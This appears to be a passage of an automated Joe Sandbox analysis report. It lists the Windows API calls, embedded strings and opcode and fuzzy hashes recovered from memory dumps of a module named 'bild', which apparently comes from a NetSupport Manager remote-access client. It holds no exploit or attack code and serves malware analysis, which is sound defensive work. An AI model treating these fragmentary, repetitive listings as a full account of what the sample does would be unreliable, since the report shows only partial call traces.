                                                                                          • _memset.LIBCMT ref: 1101D0FE
                                                                                          • LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
                                                                                          • RegisterClassExA.USER32(00000030), ref: 1101D181
                                                                                          • GetLastError.KERNEL32 ref: 1101D187
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 430917334-4108050209
                                                                                          • Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                          • Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
                                                                                          • Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                          • Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
                                                                                          APIs
                                                                                          • LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
                                                                                          • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                          • DestroyMenu.USER32(00000000), ref: 11003372
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                          • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                          • API String ID: 468487828-934300333
                                                                                          • Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                          • Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
                                                                                          • Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                          • Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
                                                                                          APIs
                                                                                          • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                          • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                          • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 180989782-0
                                                                                          • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                          • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                          • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                          • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                          • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                          • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$EventObjectSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 2857295742-0
                                                                                          • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                          • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                          • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                          • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                          APIs
                                                                                          • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                            • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                          • EqualRect.USER32(?,?), ref: 1107713C
                                                                                          • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                          Strings
                                                                                          • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                          • m_hWnd, xrefs: 11077177
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$DeferEqualPointsRect
                                                                                          • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                          • API String ID: 2754115966-2830328467
                                                                                          • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                          • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                          • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                          • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                          APIs
                                                                                          • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                          • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                          • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Resource$FindLoadLock
                                                                                          • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                          • API String ID: 2752051264-327499879
                                                                                          • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                          • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                          • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                          • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                          • _strrchr.LIBCMT ref: 1114315A
                                                                                          • _strrchr.LIBCMT ref: 1114316A
                                                                                          • wsprintfA.USER32 ref: 11143185
                                                                                            • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                          • String ID: BILD
                                                                                          • API String ID: 2529650285-1114602597
                                                                                          • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                          • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                          • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                          • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                          APIs
                                                                                          • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                          • _memmove.LIBCMT ref: 110653B1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProfileString_memmove
                                                                                          • String ID: Device$No default printer,,LPT1:$Windows
                                                                                          • API String ID: 1665476579-2460060945
                                                                                          • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                          • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                          • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                          • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeString$__wcsicoll_memset
                                                                                          • String ID:
                                                                                          • API String ID: 3719176846-0
                                                                                          • Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                          • Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
                                                                                          • Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                          • Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeString$__wcsicoll_memset
                                                                                          • String ID:
                                                                                          • API String ID: 3719176846-0
                                                                                          • Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                          • Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
                                                                                          • Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                          • Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$VisibleWindow
                                                                                          • String ID: %d,%d,%d,%d,%d,%d
                                                                                          • API String ID: 1671172596-1913222166
                                                                                          • Opcode ID: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
